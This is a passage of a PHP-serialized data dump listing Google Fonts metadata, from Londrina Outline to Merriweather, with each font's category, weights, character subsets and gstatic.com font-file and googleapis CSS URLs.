Outline";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:93:"http://fonts.gstatic.com/s/londrinaoutline/v5/lls08GOa1eT74p072l1AWJmp8DTZ6iHear7UV05iykg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Londrina+Outline:regular";}}s:15:"londrina_shadow";a:7:{s:4:"name";s:15:"Londrina Shadow";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/londrinashadow/v4/dNYuzPS_7eYgXFJBzMoKdbw6Z3rVA5KDSi7aQxS92Nk.ttf";}s:4:"urls";a:1:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Londrina+Shadow:regular";}}s:15:"londrina_sketch";a:7:{s:4:"name";s:15:"Londrina Sketch";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/londrinasketch/v4/p7Ai06aT1Ycp_D2fyE3z69d6z_uhFGnpCOifUY1fJQo.ttf";}s:4:"urls";a:1:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Londrina+Sketch:regular";}}s:14:"londrina_solid";a:7:{s:4:"name";s:14:"Londrina Solid";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/londrinasolid/v4/yysorIEiYSBb0ylZjg791MR125CwGqh8XBqkBzea0LA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Londrina+Solid:regular";}}s:4:"lora";a:7:{s:4:"name";s:4:"Lora";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:4:{s:7:"regular";s:61:"http://fonts.gstatic.com/s/lora/v9/aXJ7KVIGcejEy1abawZazg.ttf";s:6:"italic";s:61:"http://fonts.gstatic.com/s/lora/v9/AN2EZaj2tFRpyveuNn9BOg.ttf";i:700;s:61:"http://fonts.gstatic.com/s/lora/v9/enKND5SfzQKkggBA_VnT1A.ttf";s:9:"700italic";s:61:"http://fonts.gstatic.com/s/lora/v9/ivs9j3kYU65pR9QD9YFdzQ.ttf";}s:4:"urls";a:4:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Lora:regular";s:6:"italic";s:51:"https://fonts.googleapis.com/css?family=Lora:italic";i:700;s:48:"https://fonts.googleapis.com/css?family=Lora:700";s:9:"700italic";s:54:"https://fonts.googleapis.com/css?family=Lora:700italic";}}s:21:"love_ya_like_a_sister";a:7:{s:4:"name";s:21:"Love Ya Like A Sister";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:95:"http://fonts.gstatic.com/s/loveyalikeasister/v7/LzkxWS-af0Br2Sk_YgSJY-ad1xEP8DQfgfY8MH9aBUg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:69:"https://fonts.googleapis.com/css?family=Love+Ya+Like+A+Sister:regular";}}s:17:"loved_by_the_king";a:7:{s:4:"name";s:17:"Loved by the King";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/lovedbytheking/v6/wg03xD4cWigj4YDufLBSr8io2AFEwwMpu7y5KyiyAJc.ttf";}s:4:"urls";a:1:{s:7:"regular";s:65:"https://fonts.googleapis.com/css?family=Loved+by+the+King:regular";}}s:14:"lovers_quarrel";a:7:{s:4:"name";s:14:"Lovers Quarrel";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/loversquarrel/v4/gipdZ8b7pKb89MzQLAtJHLHLxci2ElvNEmOB303HLk0.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Lovers+Quarrel:regular";}}s:12:"luckiest_guy";a:7:{s:4:"name";s:12:"Luckiest Guy";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/luckiestguy/v6/5718gH8nDy3hFVihOpkY5C3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Luckiest+Guy:regular";}}s:8:"lusitana";a:7:{s:4:"name";s:8:"Lusitana";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/lusitana/v4/l1h9VDomkwbdzbPdmLcUIw.ttf";i:700;s:86:"http://fonts.gstatic.com/s/lusitana/v4/GWtZyUsONxgkdl3Mc1P7FKCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:2:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Lusitana:regular";i:700;s:52:"https://fonts.googleapis.com/css?family=Lusitana:700";}}s:7:"lustria";a:7:{s:4:"name";s:7:"Lustria";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/lustria/v4/gXAk0s4ai0X-TAOhYzZd1w.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Lustria:regular";}}s:7:"macondo";a:7:{s:4:"name";s:7:"Macondo";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/macondo/v5/G6yPNUscRPQ8ufBXs_8yRQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Macondo:regular";}}s:18:"macondo_swash_caps";a:7:{s:4:"name";s:18:"Macondo Swash Caps";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:94:"http://fonts.gstatic.com/s/macondoswashcaps/v4/SsSR706z-MlvEH7_LS6JAPkkgYRHs6GSG949m-K6x2k.ttf";}s:4:"urls";a:1:{s:7:"regular";s:66:"https://fonts.googleapis.com/css?family=Macondo+Swash+Caps:regular";}}s:4:"mada";a:7:{s:4:"name";s:4:"Mada";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"900";}s:7:"subsets";a:2:{i:0;s:6:"arabic";i:1;s:5:"latin";}s:5:"files";a:4:{i:300;s:61:"http://fonts.gstatic.com/s/mada/v1/P46fye2TPh4fVwALgHSXCA.ttf";s:7:"regular";s:61:"http://fonts.gstatic.com/s/mada/v1/io_zUrt5o943T_q45OHLWQ.ttf";i:500;s:61:"http://fonts.gstatic.com/s/mada/v1/PhhDsBi34sP0LptbpS9m6w.ttf";i:900;s:61:"http://fonts.gstatic.com/s/mada/v1/aCyc9Kc3rOJLL6fV9VfptA.ttf";}s:4:"urls";a:4:{i:300;s:48:"https://fonts.googleapis.com/css?family=Mada:300";s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Mada:regular";i:500;s:48:"https://fonts.googleapis.com/css?family=Mada:500";i:900;s:48:"https://fonts.googleapis.com/css?family=Mada:900";}}s:5:"magra";a:7:{s:4:"name";s:5:"Magra";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/magra/v4/hoZ13bwCXBxuGZqAudgc5A.ttf";i:700;s:62:"http://fonts.gstatic.com/s/magra/v4/6fOM5sq5cIn8D0RjX8Lztw.ttf";}s:4:"urls";a:2:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Magra:regular";i:700;s:49:"https://fonts.googleapis.com/css?family=Magra:700";}}s:13:"maiden_orange";a:7:{s:4:"name";s:13:"Maiden Orange";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/maidenorange/v6/ZhKIA2SPisEwdhW7g0RUWojjx0o0jr6fNXxPgYh_a8Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Maiden+Orange:regular";}}s:7:"maitree";a:7:{s:4:"name";s:7:"Maitree";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:6:{i:0;s:3:"200";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"500";i:4;s:3:"600";i:5;s:3:"700";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:4:"thai";i:2;s:10:"vietnamese";i:3;s:9:"latin-ext";}s:5:"files";a:6:{i:200;s:85:"http://fonts.gstatic.com/s/maitree/v1/JTlrRs3bVPV4i05cUIx_z_esZW2xOQ-xsNqO47m55DA.ttf";i:300;s:85:"http://fonts.gstatic.com/s/maitree/v1/rEGdABAOaqCHggl37mkWjfesZW2xOQ-xsNqO47m55DA.ttf";s:7:"regular";s:64:"http://fonts.gstatic.com/s/maitree/v1/SpKVJkAjDAYOr1VkdSRspA.ttf";i:500;s:85:"http://fonts.gstatic.com/s/maitree/v1/2VHD7TXjRhN4Xu74SEPGdvesZW2xOQ-xsNqO47m55DA.ttf";i:600;s:85:"http://fonts.gstatic.com/s/maitree/v1/uuazDnPwt30gW3cKsG-e0_esZW2xOQ-xsNqO47m55DA.ttf";i:700;s:85:"http://fonts.gstatic.com/s/maitree/v1/cnHhc9fphsL3q-pistN3IPesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:6:{i:200;s:51:"https://fonts.googleapis.com/css?family=Maitree:200";i:300;s:51:"https://fonts.googleapis.com/css?family=Maitree:300";s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Maitree:regular";i:500;s:51:"https://fonts.googleapis.com/css?family=Maitree:500";i:600;s:51:"https://fonts.googleapis.com/css?family=Maitree:600";i:700;s:51:"https://fonts.googleapis.com/css?family=Maitree:700";}}s:4:"mako";a:7:{s:4:"name";s:4:"Mako";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:61:"http://fonts.gstatic.com/s/mako/v7/z5zSLmfPlv1uTVAdmJBLXg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Mako:regular";}}s:8:"mallanna";a:7:{s:4:"name";s:8:"Mallanna";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"telugu";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/mallanna/v4/krCTa-CfMbtxqF0689CbuQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Mallanna:regular";}}s:7:"mandali";a:7:{s:4:"name";s:7:"Mandali";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"telugu";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/mandali/v4/0lF8yJ7fkyjXuqtSi5bWbQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Mandali:regular";}}s:9:"marcellus";a:7:{s:4:"name";s:9:"Marcellus";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/marcellus/v4/UjiLZzumxWC9whJ86UtaYw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Marcellus:regular";}}s:12:"marcellus_sc";a:7:{s:4:"name";s:12:"Marcellus SC";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/marcellussc/v4/_jugwxhkkynrvsfrxVx8gS3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Marcellus+SC:regular";}}s:12:"marck_script";a:7:{s:4:"name";s:12:"Marck Script";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/marckscript/v7/O_D1NAZVOFOobLbVtW3bci3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Marck+Script:regular";}}s:9:"margarine";a:7:{s:4:"name";s:9:"Margarine";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/margarine/v5/DJnJwIrcO_cGkjSzY3MERw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Margarine:regular";}}s:9:"marko_one";a:7:{s:4:"name";s:9:"Marko One";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/markoone/v6/hpP7j861sOAco43iDc4n4w.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Marko+One:regular";}}s:8:"marmelad";a:7:{s:4:"name";s:8:"Marmelad";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/marmelad/v6/jI0_FBlSOIRLL0ePWOhOwQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Marmelad:regular";}}s:6:"martel";a:7:{s:4:"name";s:6:"Martel";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:7:{i:0;s:3:"200";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"600";i:4;s:3:"700";i:5;s:3:"800";i:6;s:3:"900";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:7:{i:200;s:63:"http://fonts.gstatic.com/s/martel/v1/_wfGdswZbat7P4tupHLA1w.ttf";i:300;s:63:"http://fonts.gstatic.com/s/martel/v1/SghoV2F2VPdVU3P0a4fa9w.ttf";s:7:"regular";s:63:"http://fonts.gstatic.com/s/martel/v1/9ALu5czkaaf5zsYk6GJEnQ.ttf";i:600;s:63:"http://fonts.gstatic.com/s/martel/v1/Kt9uPhH1PvUwuZ5Y6zuAMQ.ttf";i:700;s:63:"http://fonts.gstatic.com/s/martel/v1/4OzIiKB5wE36xXL2U0vzWQ.ttf";i:800;s:63:"http://fonts.gstatic.com/s/martel/v1/RVF8drcQoRkRL7l_ZkpTlQ.ttf";i:900;s:63:"http://fonts.gstatic.com/s/martel/v1/iS0YUpFJoiLRlnyl40rpEA.ttf";}s:4:"urls";a:7:{i:200;s:50:"https://fonts.googleapis.com/css?family=Martel:200";i:300;s:50:"https://fonts.googleapis.com/css?family=Martel:300";s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Martel:regular";i:600;s:50:"https://fonts.googleapis.com/css?family=Martel:600";i:700;s:50:"https://fonts.googleapis.com/css?family=Martel:700";i:800;s:50:"https://fonts.googleapis.com/css?family=Martel:800";i:900;s:50:"https://fonts.googleapis.com/css?family=Martel:900";}}s:11:"martel_sans";a:7:{s:4:"name";s:11:"Martel Sans";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:7:{i:0;s:3:"200";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"600";i:4;s:3:"700";i:5;s:3:"800";i:6;s:3:"900";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:7:{i:200;s:88:"http://fonts.gstatic.com/s/martelsans/v2/7ajme85aKKx_SCWF59ImQEnzyIngrzGjGh22wPb6cGM.ttf";i:300;s:88:"http://fonts.gstatic.com/s/martelsans/v2/7ajme85aKKx_SCWF59ImQC9-WlPSxbfiI49GsXo3q0g.ttf";s:7:"regular";s:88:"http://fonts.gstatic.com/s/martelsans/v2/91c8DPDZncMc0RFfhmc2RqCWcynf_cDxXwCLxiixG1c.ttf";i:600;s:88:"http://fonts.gstatic.com/s/martelsans/v2/7ajme85aKKx_SCWF59ImQJZ7xm-Bj30Bj2KNdXDzSZg.ttf";i:700;s:88:"http://fonts.gstatic.com/s/martelsans/v2/7ajme85aKKx_SCWF59ImQHe1Pd76Vl7zRpE7NLJQ7XU.ttf";i:800;s:88:"http://fonts.gstatic.com/s/martelsans/v2/7ajme85aKKx_SCWF59ImQA89PwPrYLaRFJ-HNCU9NbA.ttf";i:900;s:88:"http://fonts.gstatic.com/s/martelsans/v2/7ajme85aKKx_SCWF59ImQCenaqEuufTBk9XMKnKmgDA.ttf";}s:4:"urls";a:7:{i:200;s:55:"https://fonts.googleapis.com/css?family=Martel+Sans:200";i:300;s:55:"https://fonts.googleapis.com/css?family=Martel+Sans:300";s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Martel+Sans:regular";i:600;s:55:"https://fonts.googleapis.com/css?family=Martel+Sans:600";i:700;s:55:"https://fonts.googleapis.com/css?family=Martel+Sans:700";i:800;s:55:"https://fonts.googleapis.com/css?family=Martel+Sans:800";i:900;s:55:"https://fonts.googleapis.com/css?family=Martel+Sans:900";}}s:6:"marvel";a:7:{s:4:"name";s:6:"Marvel";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:4:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/marvel/v6/Fg1dO8tWVb-MlyqhsbXEkg.ttf";s:6:"italic";s:63:"http://fonts.gstatic.com/s/marvel/v6/HzyjFB-oR5usrc7Lxz9g8w.ttf";i:700;s:63:"http://fonts.gstatic.com/s/marvel/v6/WrHDBL1RupWGo2UcdgxB3Q.ttf";s:9:"700italic";s:84:"http://fonts.gstatic.com/s/marvel/v6/Gzf5NT09Y6xskdQRj2kz1qCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:4:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Marvel:regular";s:6:"italic";s:53:"https://fonts.googleapis.com/css?family=Marvel:italic";i:700;s:50:"https://fonts.googleapis.com/css?family=Marvel:700";s:9:"700italic";s:56:"https://fonts.googleapis.com/css?family=Marvel:700italic";}}s:4:"mate";a:7:{s:4:"name";s:4:"Mate";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:61:"http://fonts.gstatic.com/s/mate/v5/ooFviPcJ6hZP5bAE71Cawg.ttf";s:6:"italic";s:61:"http://fonts.gstatic.com/s/mate/v5/5XwW6_cbisGvCX5qmNiqfA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Mate:regular";s:6:"italic";s:51:"https://fonts.googleapis.com/css?family=Mate:italic";}}s:7:"mate_sc";a:7:{s:4:"name";s:7:"Mate SC";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/matesc/v5/-YkIT2TZoPZF6pawKzDpWw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Mate+SC:regular";}}s:9:"maven_pro";a:7:{s:4:"name";s:9:"Maven Pro";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:3:"500";i:2;s:3:"700";i:3;s:3:"900";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:4:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/mavenpro/v7/sqPJIFG4gqsjl-0q_46Gbw.ttf";i:500;s:86:"http://fonts.gstatic.com/s/mavenpro/v7/SQVfzoJBbj9t3aVcmbspRi3USBnSvpkopQaUR-2r7iU.ttf";i:700;s:86:"http://fonts.gstatic.com/s/mavenpro/v7/uDssvmXgp7Nj3i336k_dSi3USBnSvpkopQaUR-2r7iU.ttf";i:900;s:86:"http://fonts.gstatic.com/s/mavenpro/v7/-91TwiFzqeL1F7Kh91APwS3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:4:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Maven+Pro:regular";i:500;s:53:"https://fonts.googleapis.com/css?family=Maven+Pro:500";i:700;s:53:"https://fonts.googleapis.com/css?family=Maven+Pro:700";i:900;s:53:"https://fonts.googleapis.com/css?family=Maven+Pro:900";}}s:7:"mclaren";a:7:{s:4:"name";s:7:"McLaren";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/mclaren/v4/OprvTGxaiINBKW_1_U0eoQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=McLaren:regular";}}s:6:"meddon";a:7:{s:4:"name";s:6:"Meddon";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/meddon/v9/f8zJO98uu2EtSj9p7ci9RA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Meddon:regular";}}s:13:"medievalsharp";a:7:{s:4:"name";s:13:"MedievalSharp";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/medievalsharp/v8/85X_PjV6tftJ0-rX7KYQkOe45sJkivqprK7VkUlzfg0.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=MedievalSharp:regular";}}s:10:"medula_one";a:7:{s:4:"name";s:10:"Medula One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/medulaone/v6/AasPgDQak81dsTGQHc5zUPesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Medula+One:regular";}}s:12:"meera_inimai";a:7:{s:4:"name";s:12:"Meera Inimai";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:5:"tamil";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/meerainimai/v1/fWbdJc2ZVZnWCi06NRCxDy3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Meera+Inimai:regular";}}s:6:"megrim";a:7:{s:4:"name";s:6:"Megrim";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/megrim/v7/e-9jVUC9lv1zxaFQARuftw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Megrim:regular";}}s:11:"meie_script";a:7:{s:4:"name";s:11:"Meie Script";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/meiescript/v4/oTIWE5MmPye-rCyVp_6KEqCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Meie+Script:regular";}}s:8:"merienda";a:7:{s:4:"name";s:8:"Merienda";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/merienda/v4/MYY6Og1qZlOQtPW2G95Y3A.ttf";i:700;s:86:"http://fonts.gstatic.com/s/merienda/v4/GlwcvRLlgiVE2MBFQ4r0sKCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:2:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Merienda:regular";i:700;s:52:"https://fonts.googleapis.com/css?family=Merienda:700";}}s:12:"merienda_one";a:7:{s:4:"name";s:12:"Merienda One";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/meriendaone/v7/bCA-uDdUx6nTO8SjzCLXvS3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Merienda+One:regular";}}s:12:"merriweather";a:7:{s:4:"name";s:12:"Merriweather";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:8:{i:0;s:3:"300";i:1;s:9:"300italic";i:2;s:7:"regular";i:3;s:6:"italic";i:4;s:3:"700";i:5;s:9:"700italic";i:6;s:3:"900";i:7;s:9:"900italic";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:12:"cyrillic-ext";i:2;s:9:"latin-ext";i:3;s:8:"cyrillic";}s:5:"files";a:8:{i:300;s:91:"http://fonts.gstatic.com/s/merriweather/v13/Zvc